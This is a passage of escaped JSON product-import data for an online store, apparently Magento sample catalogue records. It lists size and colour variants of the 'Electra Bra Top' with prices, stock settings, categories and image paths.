Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1545\":{\"sku\":\"WB01-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-S-Black\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1546\":{\"sku\":\"WB01-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-S-Gray\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1547\":{\"sku\":\"WB01-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-S-Purple\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1548\":{\"sku\":\"WB01-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-M-Black\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1549\":{\"sku\":\"WB01-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-M-Gray\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1550\":{\"sku\":\"WB01-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-M-Purple\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1551\":{\"sku\":\"WB01-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-L-Black\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"image\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb01-black-0.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1552\":{\"sku\":\"WB01-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Electra Bra Top-L-Gray\",\"description\":\"<p>A heavenly soft and stylish eco garment, the Electra Bra Top is perfect for wearing on its own as a hot yoga top or layered under a tank.<\\/p>\\n<p>&bull; Gray rouched bra top.<br \\/>&bull; Attractive back straps feature contrasting motif fabric.<br \\/>&bull; Interior bra top is lined with breathable mesh.<br \\/>&bull; Elastic underband for superior support.<br \\/>&bull; Removable cup inserts.<br \\/>&bull; Chafe-free flat lock seams provide added comfort.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"electra-bra-top-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb01-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb01-gray_alt1.jpg,\\/w\\/b\\/wb01-gray_back.jpg\",\"image\":\"\\/w\